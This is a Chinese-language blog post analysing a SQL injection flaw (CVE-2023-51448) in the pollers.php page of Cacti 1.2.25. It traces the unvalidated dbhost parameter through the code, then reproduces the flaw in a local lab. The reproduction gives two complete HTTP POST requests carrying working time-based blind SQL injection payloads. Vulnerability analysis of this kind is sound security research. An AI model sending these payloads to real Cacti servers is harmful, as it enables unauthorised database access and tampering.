Cacti SQL注入漏洞分析（CVE-2023-51448）

昵称还在想呢

于 2024-08-19 22:44:02 发布

阅读量419

点赞数 5

分类专栏： PHP代码审计文章标签： sql 数据库

本文链接：https://blog.csdn.net/shelter1234567/article/details/141336295

版权

PHP代码审计专栏收录该内容

18 篇文章 2 订阅

订阅专栏

Cacti 为全球用户提供强大且可扩展的运营监控和故障管理框架。它还是一个完整的网络绘图解决方案，旨在利用RRDTool的数据存储和绘图功能。Cacti 包括一个完全分布式和容错的数据收集框架、用于设备、图表和树的高级基于模板的自动化功能、多种数据采集方法、通过插件进行扩展的能力、基于角色的用户、组和域管理功能，此外还有一个主题引擎和多种语言支持，所有这些都是开箱即用的。

Cacti pollers.php文件接口在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

影响版本1.2.25

代码分析

由action=save 进入form_save函数

由save_component_poller=1进入if语句之后由id=2 再进入下面的if语句

$save['dbhost']        = form_input_validate(get_nfilter_request_var('dbhost'),    'dbhost',    '', true, 3);

dbhost没有给$regexp_match，等于form_input_calidate没有做任何处理

根据message信息判断这里两个if语句要是id不能为重复的值

因为dbhost不等于localhost接下来进入321行，id=2 大于1 进入poller_host_duplicate函数

这里显然易见，$host被拼接在like语句之后，可以进行sql注入。

漏洞复现

下载源码搭建测试环境

使用admin/admin进入后台，进入数据采集器页面（pollers.php）,查看源码获取__csrf_magic值

后发送如下的包，进行sql盲注判断

POST /pollers.php?header=false HTTP/1.1
Host: 192.168.76.128:8080
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.76.128:8080/pollers.php?clear=1&
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: CactiTimeZone=480; Cacti=b916ec1e58797bcfe864ccad55fc18a1; cacti_remembers=1%2C0%2Cd91e36164ef89e826e01c8ca07c4bcb6492a66848a0b6c73cff8f5b4ace752f9; CactiDateTime=Sun Aug 18 2024 20:52:33 GMT+0800 (ä¸å½æ åæ¶é´)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 230

__csrf_magic=sid:60616422313682591b714451a04204353c1b2403,1723985760&name=Main+Poller&hostname=unknown&timezone=&notes=&processes=1&threads=1&id=2&save_component_poller=1&dbhost="XOR(if(now()=sysdate(),sleep(4),0))XOR"&action=save

或者

POST /pollers.php?header=false HTTP/1.1
Host: 192.168.76.128:8080
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.76.128:8080/pollers.php?clear=1&
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: CactiTimeZone=480; Cacti=b916ec1e58797bcfe864ccad55fc18a1; cacti_remembers=1%2C0%2Cd91e36164ef89e826e01c8ca07c4bcb6492a66848a0b6c73cff8f5b4ace752f9; CactiDateTime=Sun Aug 18 2024 20:52:33 GMT+0800 (ä¸å½æ åæ¶é´)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 270

__csrf_magic=sid:60616422313682591b714451a04204353c1b2403,1723985760&name=Main+Poller&hostname=unknown&timezone=&notes=&processes=1&threads=1&id=2&save_component_poller=1&dbhost=";%20select%20sleep(6);%20select%20*%20from%20poller%20where%201=1%20and%20"%"="&action=save

效果如下

昵称还在想呢

关注

5
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
0
评论
Cacti SQL注入漏洞分析（CVE-2023-51448）

Cacti 为全球用户提供强大且可扩展的运营监控和故障管理框架。它还是一个完整的网络绘图解决方案，旨在利用的数据存储和绘图功能。Cacti 包括一个完全分布式和容错的数据收集框架、用于设备、图表和树的高级基于模板的自动化功能、多种数据采集方法、通过插件进行扩展的能力、基于角色的用户、组和域管理功能，此外还有一个主题引擎和多种语言支持，所有这些都是开箱即用的。Cacti pollers.php文件接口在SQL注入漏洞。
复制链接

扫一扫